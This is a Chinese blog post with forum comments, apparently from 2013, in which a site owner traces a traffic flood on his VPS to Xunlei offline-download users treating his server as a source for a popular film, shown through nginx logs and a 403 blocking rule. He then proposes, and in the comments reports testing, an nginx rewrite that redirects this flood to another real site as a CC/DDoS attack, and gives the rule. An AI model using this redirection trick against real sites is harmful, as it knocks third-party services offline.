起因
上周,某部比较出名的电影据说出了完整版非枪版,于是在某天堂找到了下载地址。但是下载地址已经失效,朋友给了个迅雷的会员号,于是就打算看看是不是枪版。把某天堂的地址拉了进去,果断找到了已经被迅雷缓存掉了。于是想用迅雷的快速播放功能,但显示源地址错误,无法快速播放。
由于博客上vps剩余流量充足,才用了不到3G/500G,于是就用vps把片子下载了,然后用迅雷的离线离线我博客的地址。
在迅雷离线的时候,查看vps的流出流量都比较稳定,基本上了离线页面显示的下载速度是相同的。
一切还好,很快就离线好了,此时vps没发现什么异常。
有点问题
用快速播放简单看了后,好吧不是枪版,比较满意,于是就开始用家里电脑下载了。
顺便还开了加速通道。。。。。
发现有点问题,一开始下载,网站马上就打不开了,一暂停,又马上恢复了。
当初以为是迅雷占满了vps 的流出,于是就没怎么管。
监控宝发来了服务器不可用的提醒,还是没管。
继续写作业了。
情况不对
写了会作业,大概过了半个多小时,目测电影已经下完了,用手机打开自己的网站,发现还是无法打开。
基本判断应该是出了什么事了,蛋疼地打开了SolusVM平台,我吓尿了。
瞬时的流出居然达到了40M/S,并且占用了我100G的流量…..

感觉到情况不太多,马上改上电脑开始处理。。。。
DDoS deflate战败
一直以来都有用DDoS deflate来防御小规模攻击的习惯
查了下iptables -L,封了的IP并不多,于是就把条件降低,但发现还是不行。
于是开始蛋疼的手动封,但发现效果还是不明显,重启了nginx依然网站无法打开。
cpu占用>85%
top了一下,多个php-fpm进程占用极高
检查特征
把日志拖了下来看看,蛋疼的由于系统时间出错,导致一开始没发现被攻击的特征。
当时时间14时左右,但是此时服务器时间才为9时
蛋疼……
直到我拖到最下面,发现了被大规模地访问视频的下载地址,后缀为rmvb
于是果断去nginx写规则把后缀为rmvb的给403掉
初见成效
ban掉*.rmvb的访问后,cpu一下子就下来了,恢复到了正常的状况。。
重启服务器后,服务器下的网站均恢复了正常访问。
蛋疼又来
上学昂上学昂……
今天回来的时候,发现尼玛突然多了4G的东西,查了一下,我跪了。
access.log这个伟大的日志文件占用的4G的空间。。。

让我情何以堪……….
改名之,重启nginx,重新生成了一个日志,拉下来一看。。。。。
部分日志

121.34.191.96 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; KB974488)"
180.110.85.117 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xE8\\x87\\xB4\\xE6\\x88\\x91\\xE4\\xBB\\xAC\\xE7\\xBB\\x88\\xE5\\xB0\\x86\\xE9\\x80\\x9D\\xE5\\x8E\\xBB\\xE7\\x9A\\x84\\xE9\\x9D\\x92\\xE6\\x98\\xA5.HD.1024x576.\\xE5\\x9B\\xBD\\xE8\\xAF\\xAD\\xE4\\xB8\\xAD\\xE5\\xAD\\x97.rmvb HTTP/1.1" 403 564 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"
110.184.8.46 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xE8\\x87\\xB4\\xE6\\x88\\x91\\xE4\\xBB\\xAC\\xE7\\xBB\\x88\\xE5\\xB0\\x86\\xE9\\x80\\x9D\\xE5\\x8E\\xBB\\xE7\\x9A\\x84\\xE9\\x9D\\x92\\xE6\\x98\\xA5.HD.1024x576.\\xE5\\x9B\\xBD\\xE8\\xAF\\xAD\\xE4\\xB8\\xAD\\xE5\\xAD\\x97.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0E; BRI/2; InfoPath.2; .NET4.0C; youxihe.1437; Media Center PC 6.0; MASP; youxihe.1437)"
61.187.6.123 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xD6\\xC2\\xCE\\xD2\\xC3\\xC7\\xD6\\xD5\\xBD\\xAB\\xCA\\xC5\\xC8\\xA5\\xB5\\xC4\\xC7\\xE0\\xB4\\xBA.HD.1024x576.\\xB9\\xFA\\xD3\\xEF\\xD6\\xD0\\xD7\\xD6.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
61.136.145.119 - - [24/May/2013:19:28:42 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"
218.108.168.178 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
180.110.85.117 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; EIE10;ZHCNMSN)"
113.120.105.197 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%E8%87%B4%E6%88%91%E4%BB%AC%E7%BB%88%E5%B0%86%E9%80%9D%E5%8E%BB%E7%9A%84%E9%9D%92%E6%98%A5.HD.1024x576.%E5%9B%BD%E8%AF%AD%E4%B8%AD%E5%AD%97.rmvb HTTP/1.1" 404 10110 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
59.56.115.134 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
61.131.97.40 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/%5Bimlonghao-imlonghao.com%5D.%D6%C2%CE%D2%C3%C7%D6%D5%BD%AB%CA%C5%C8%A5%B5%C4%C7%E0%B4%BA.HD.1024x576.%B9%FA%D3%EF%D6%D0%D7%D6.rmvb HTTP/1.1" 403 564 "http://imlonghao.com/wp-content/uploads/2013/05" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MATP; Media Center PC 6.0)"
114.83.179.112 - - [24/May/2013:19:28:43 +0800] "GET /wp-content/uploads/2013/05/[imlonghao-imlonghao.com].\\xD6\\xC2\\xCE\\xD2\\xC3\\xC7\\xD6\\xD5\\xBD\\xAB\\xCA\\xC5\\xC8\\xA5\\xB5\\xC4\\xC7\\xE0\\xB4\\xBA.HD.1024x576.\\xB9\\xFA\\xD3\\xEF\\xD6\\xD0\\xD7\\xD6.rmvb HTTP/1.1" 404 10110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; youxihe.1577)"

及时返回了403,但是每秒N次不同地方来的流量你也伤不起啊是不是。。。。
暂时停用了日志功能…….
删掉了那个4G的大日志…..
同样的问题,我测试过百度云离线下载也存在这种问题,我之前在网站发的Metasploit魔鬼训练营渗透测试 PDF下载 (附攻防演示环境),里面有附件加起来有12.5G都是在服务器上面,结果用百度云离线下载以后每天有N多的ip来请求下载,每天有几百G的流量流出,最后实在受不了,直接删除链接了,附件地址改为百度云地址。
写在后面
想了想为什么会有那么多不同地方的机子访问这个地址,这个地址除了我自己知道之外没有告诉过别人。
应该就是迅雷的问题了,这部电影当时比较红,可能在离线下载的时候,我这边离线到的MD5与某天堂那边电影的MD5相同,因此迅雷就把我当成了源地址之一,但用户在离线服务器提出下载请求的时候,部分下载请求就会转移到我这边。
从日志中抓了个IP去查,某某宽带,应该不会是迅雷官方服务器,而是用户机子了..
当然,上面的只是我的猜测,有什么不对的地方也敬请指出讨论讨论…
现在这个地址每秒种也有N的请求,试想一下,将这个地址rewrite到某些自己不喜欢的站点,会造成CC攻击么?
假如上面试想成立的话,即用自己的vps离线一个热门的文件后,部分下载请求访问过来,rewrite到别人的站点,岂不是造成了一个很牛X的攻击?

某星人吐槽:
1\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-24 21:36
试了试rewrite到别人的站,秒卡.....
2\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-24 21:39
location ~\* \\.(rmvb)$ {
rewrite ^/ http://www.wooyun.org/searchbug.php?q=%25;
}
3\#
insight-labs (Root Yourself in Success) \| 2013-05-24 21:42
迅雷会follow rewrite么?
4\#
insight-labs (Root Yourself in Success) \| 2013-05-24 21:44
@imlonghao
不过不得不说这个思路极其淫荡
如果会follow rewrite的话,就有资本ddos gfw了……
5\#
xsser (十根阳具有长短!!) \| 2013-05-24 21:51
@imlonghao 尼玛
6\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-24 22:02
@insight-labs 等我再开多个小网站看看日志就知道了。。
7\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-24 22:09
@xsser @insight-labs
182.149.204.207 - - [24/May/2013:22:05:49 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
219.151.158.144 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
182.149.204.207 - - [24/May/2013:22:05:50 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
113.138.50.183 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
27.153.68.113 - - [24/May/2013:22:05:52 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
182.149.204.207 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
183.156.53.206 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
1.203.40.140 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; InfoPath.2)"
219.151.158.144 - - [24/May/2013:22:05:53 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
123.149.228.64 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
183.157.115.3 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
111.172.197.39 - - [24/May/2013:22:05:54 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
182.149.204.207 - - [24/May/2013:22:05:56 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
220.189.193.67 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; KB974487)"
183.157.115.3 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
121.237.2.43 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
222.80.175.25 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)"
183.156.53.206 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:05:58 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
180.157.89.162 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"
113.76.33.74 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MASP)"
61.185.178.173 - - [24/May/2013:22:05:59 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; 4399Box.1261; 4399Box.1261)"
113.86.145.177 - - [24/May/2013:22:06:01 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 718; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
182.149.204.207 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:06:02 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
58.19.214.162 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 206 "-" "Mozilla/4.0"
61.153.0.130 - - [24/May/2013:22:06:04 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
182.149.204.207 - - [24/May/2013:22:06:05 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
183.156.53.206 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
182.149.204.207 - - [24/May/2013:22:06:06 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:06:07 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
59.56.20.23 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
112.65.211.100 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 9.0; qdesk 2.4.1263.203; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.2)"
115.206.20.133 - - [24/May/2013:22:06:08 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB7.4)"
182.149.204.207 - - [24/May/2013:22:06:09 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
182.149.204.207 - - [24/May/2013:22:06:10 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
111.172.197.39 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
14.147.86.62 - - [24/May/2013:22:06:11 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; QQPinyin 685; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
183.156.53.206 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
111.178.209.148 - - [24/May/2013:22:06:13 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
182.149.204.207 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
183.157.115.3 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
183.17.47.78 - - [24/May/2013:22:06:14 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.19.214.162 - - [24/May/2013:22:06:15 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
27.188.231.155 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MALN; .NET4.0E; Zune 4.7; InfoPath.1)"
111.172.197.39 - - [24/May/2013:22:06:16 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
58.48.1.93 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
222.69.92.85 - - [24/May/2013:22:06:17 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
61.153.149.166 - - [24/May/2013:22:06:17 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Apache; .NET CLR 2.0.50727)"
58.48.106.206 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; KB974488)"
113.65.198.144 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
182.149.204.207 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
114.233.127.15 - - [24/May/2013:22:06:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
61.145.38.137 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
117.65.195.17 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
101.85.201.140 - - [24/May/2013:22:06:22 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
182.149.204.207 - - [24/May/2013:22:06:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
111.172.197.39 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
222.70.224.156 - - [24/May/2013:22:06:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; MATP)"
116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
183.156.9.151 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)"
116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
116.11.198.33 - - [24/May/2013:22:06:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
1.194.117.98 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
116.11.198.33 - - [24/May/2013:22:06:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
117.88.225.78 - - [24/May/2013:22:06:27 +0800] "GET / HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; KB974488)"
218.89.59.42 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0; BOIE9;ZHCN)"
116.11.198.33 - - [24/May/2013:22:06:27 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Embedded Web Browser from: http://bsalsa.com/; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
111.172.197.39 - - [24/May/2013:22:06:28 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
